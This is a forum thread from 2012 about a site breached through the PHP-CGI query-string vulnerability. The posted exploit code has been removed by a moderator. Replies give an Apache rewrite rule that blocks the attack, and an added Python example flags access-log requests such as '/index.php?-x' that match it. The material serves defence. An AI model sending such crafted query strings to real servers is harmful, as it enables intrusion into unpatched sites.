hackers breached my site through UBB #249131 05/11/2012 9:19 AM
Joined: May 2008
Posts: 735
Bad Frog Offline OP
old hand
hackers found a way to inject a file onto my site that self replicated throughout my server and injected malicious code in all index.htm and index.html files.

they did it with this...
Code
-- SD: saved code locally and removed from post --


and this is what they were injecting...


I am using UBB 7.5.6p2


Last edited by SD; 05/11/2012 10:44 AM. Reason: Just removed actual exploit line

"No matter where you go, there you are."
"If you can't do something smart, Do something right"
"There are three kinds of people in the world, those who can count, and those who can't"
Re: hackers breached my site through UBB [Re: Bad Frog] #249132 05/11/2012 10:40 AM
Joined: Jun 2006
Posts: 81
Mike L Offline
member
If the above code works, it is WAY NOT COOL and irresponsible to post it in public.

Please delete it and send it to UBBSystem as a PM or e-mail or both.


Re: hackers breached my site through UBB [Re: Bad Frog] #249133 05/11/2012 10:42 AM
Joined: Apr 2007
Posts: 3,938
SD Offline
Former Developer
it's a php flaw and not a ubb flaw. ( from what i've gathered )

if your host is running php as a CGI, then there is a known exploit to any php that can be temporarily fixed with .htaccess change..

http://www.php.net/archive/2012.php#id2012-05-03-1

Quote:
To fix this, update to PHP 5.3.12 or PHP 5.4.2.

We recognize that since CGI is a rather outdated way to run PHP, it may not be feasible to upgrade these sites to a modern version of PHP.

An alternative is to configure your web server to not let these types of requests with query strings starting with a "-" and not containing a "=" through. Adding a rule like this should not break any sites. For Apache using mod_rewrite it would look like this:


( mod_rewrite must be enabled - usually is - add to .htaccess )

Code
RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$ [NC]
RewriteRule ^(.*) $1? [L]


can you run phpinfo ( from your cpanel and verify ? )

ty
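
The rule quoted in the post above can also be used as a detection check over web server access logs, to see whether requests of this shape have already reached the site. This is an added example, not part of the original post or the PHP advisory; the log lines, IP addresses and paths are constructed samples, and the function names are hypothetical.

```python
import re

# Same pattern as the RewriteCond quoted above; the [NC] flag maps to re.IGNORECASE.
RULE = re.compile(r"^(%2d|-)[^=]+$", re.IGNORECASE)

# Minimal matcher for the client IP and request line of a combined-format log entry.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)

def matches_rule(query: str) -> bool:
    """True when the raw (undecoded) query string would trigger the rewrite rule."""
    return bool(RULE.match(query))

def flag_requests(lines):
    """Return (ip, target) for every request whose query string matches the rule."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a request line we can parse
        target = m.group("target")
        _path, sep, query = target.partition("?")
        # Only requests that actually carry a query string are candidates.
        if sep and matches_rule(query):
            hits.append((m.group("ip"), target))
    return hits

# Constructed sample log lines (documentation IP ranges, made-up paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [11/May/2012:09:01:02 +0000] "GET /ubbthreads.php?ubb=showflat&Number=249131 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [11/May/2012:09:01:05 +0000] "GET /index.php?-x HTTP/1.1" 200 812',
    '198.51.100.7 - - [11/May/2012:09:01:06 +0000] "POST /index.php?%2Dx+%2Dy HTTP/1.1" 200 40',
    '203.0.113.4 - - [11/May/2012:09:02:00 +0000] "GET /search.php?-sort=date HTTP/1.1" 200 900',
    '203.0.113.4 - - [11/May/2012:09:02:09 +0000] "GET /index.php HTTP/1.1" 200 700',
]

if __name__ == "__main__":
    for ip, target in flag_requests(SAMPLE_LOG):
        print(f"suspicious: {ip} {target}")
```

A query string such as `-sort=date` is not flagged because it contains "=", which is why the quoted advisory expects the rule not to break ordinary sites.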

Re: hackers breached my site through UBB [Re: Bad Frog] #249134 05/11/2012 10:46 AM
Joined: Apr 2007
Posts: 3,938
SD Offline
Former Developer
note: if your PHP is running as a FAST CGI or DSO, then this can't be exploited.

so push your host to run 1 of the 2 AND have php upgraded to latest version.

this has been around in php/cgi for 8yrs...

you should really push your host to:

Quote:
Cid advised Web servers administrators who run PHP through php-cgi, to update to the new PHP 5.4.3 or PHP 5.3.13, or to modify their setup so that it uses the PHP module (mod_php) under Apache or FastCGI, which is not vulnerable.


if possible, however..

2c

Re: hackers breached my site through UBB [Re: Bad Frog] #249145 05/11/2012 11:50 AM
Joined: Dec 2003
Posts: 1,796
AllenAyres Offline
Pooh-Bah
zoinks, or change hosts if they refuse to update 8 year old software - there's a responsibility to customers regarding this when they decide to accept money for hosting.


- Allen
- ThreadsDev | PraiseCafe
Re: hackers breached my site through UBB [Re: Bad Frog] #249146 05/11/2012 11:52 AM
Joined: Apr 2007
Posts: 3,938
SD Offline
Former Developer
well, it's an 8yr old bug.. the software ( php ) is recent builds, but the host has decided to run it as a CGI ( ancient )..

note: ubbcentral runs as fastcgi ( safe ) here.

so you are correct, allen that the host should get away from CGI and/or upgrade to one of those 2 versions of php


Re: hackers breached my site through UBB [Re: Bad Frog] #249155 05/11/2012 3:07 PM
Joined: May 2008
Posts: 735
Bad Frog Offline OP
old hand
I pointed my host to this thread and they took care of things.
Thank you for the help!

